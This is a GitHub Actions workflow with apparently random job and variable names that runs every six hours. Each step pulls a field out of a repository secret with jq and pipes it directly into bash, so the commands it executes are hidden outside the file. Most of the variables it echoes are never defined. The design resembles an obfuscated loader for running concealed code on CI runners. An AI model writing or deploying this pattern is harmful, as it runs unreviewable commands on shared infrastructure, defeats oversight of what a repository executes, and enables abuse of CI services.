name: dongguange7412

on:
  workflow_dispatch:
  schedule:
    - cron: '47 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongguange7412
        env:
          iqibv9: ${{ secrets.iqibv9 }}
        run: |
          echo $iqibv9 | jq -r .u893 | /bin/bash
          echo $mh09303 | jq -r .uz1 | /bin/bash
          echo $tu56498 | jq -r .nhssj1533 | /bin/bash
          echo $aot3 | jq -r .okb973 | /bin/bash
          echo $gifa8 | jq -r .xkywg63467 | /bin/bash
          echo $al8028 | jq -r .vunt62784 | /bin/bash
          echo $ie6580 | jq -r .c96 | /bin/bash
          echo $l367 | jq -r .wzkpk19 | /bin/bash
          echo $z27 | jq -r .ks71 | /bin/bash
          echo $wyntm961 | jq -r .xly40069 | /bin/bash
          echo $e3 | jq -r .i24 | /bin/bash
          echo $uy8 | jq -r .gms5875 | /bin/bash
          echo $ez74495 | jq -r .dxrif4206 | /bin/bash
          echo $kqar30 | jq -r .qgh7310 | /bin/bash
          echo $zj1350 | jq -r .bhsjt0 | /bin/bash

